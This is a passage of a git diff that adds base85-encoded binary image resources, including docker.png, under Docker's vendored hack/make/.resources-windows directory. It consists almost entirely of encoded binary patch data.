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

{U$3Iv~D8^4{;l+zqdvpkHAO zb~)yJ=3?A$KF0X0b3$7EfcYM4jJqxq82vEP&pFsC5; z`N{BGfidlG!6)rmWsPU}yg*)Hd)_}|ta<>=fnw}B1^G`w-mbuWfbR=-FCNIBk01I7 zBGSe_A>smz@h`~^HuxH2o>tJuY|JH5o;3Hu*P6hs1#p=$&dmEAP|aRXrduh^M;ZT= z(*nhqxM)Lj63BlxbiNe%FG}&zo&&uv1Akvr+MqS{3i)z3s0GcNV9zO2ij(c#OdGQE zx=8mAb0L2n;6s%8aOD3g$FmmmIAbZD%pi4n*G&`iA4=?V(YmhR zUv*<1hU*x5p#972F}^#I(yT}{yx0=nn=!yYM< z0PLIB`8#?JWBiTgfjZcz|Gn~hkiR@u3fdm%2Jktv2R-+{7EXEqXdLs2>i2(5Pk(25 zXmsJBE|{`0jFdg}x9CI%Eq%Yd_y zi^eHvSi%IT8K-!p-VqNzqYLMhh-c!KiCE+LNcBH6HAu`kAA6US^xp;Fth6TjzG>kb z8)rJSMH^sktgfsAd^g{7?W>dXTK?SSvP%8@OPTh$=cCRi?C4XBZ{`aj ztHng{uqbSuq8+8>I=`)Q=+Ge|zDYSh@y;Tr_9{Vncz192)R?a>oeCa#G0v?S*1KWN zqKhceH#7d17RNXU?@}5;D{J3}^Cop|rZk$|ddK3HU;C|AvhejnRfv;;z}pxc5L4+pN|+M{xqdmi{6&+4G48^mS=E_+ zJqlAjOv{6v&C8SbnwKBmVO|#I()~)Nw^{Mgon}(lhBjvhy!@(pmmZ^g5ijz^*jr*j zoX*=hK{~5%AL%;(a-`nE%MmRX-a2Z!FfUZK>QY3Dmlzw_tTeLSx;$U4GZ+1Y@8xG_ zPwvUTDGu!x+Me)K{xdVE<-*J$gGE`v20vv4=+8K^M|ky&moDEou{gBrt_uOr?>PCZ z@Mb}Nrs+W4r)0qRRW|&7GUmVlv%S#dMr=2;Vn88wB6Dz`d%HIt`@$JCN0`#sr zLEj~S;!XMPEdI^h2te4?+VHw@{||kfaxDM= literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.png b/vendor/github.com/docker/docker/hack/make/.resources-windows/docker.png new file mode 100644 index 0000000000000000000000000000000000000000..88df0b66dfcf0b298de8cd296b793b9220c4a914 GIT binary patch literal 658195 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 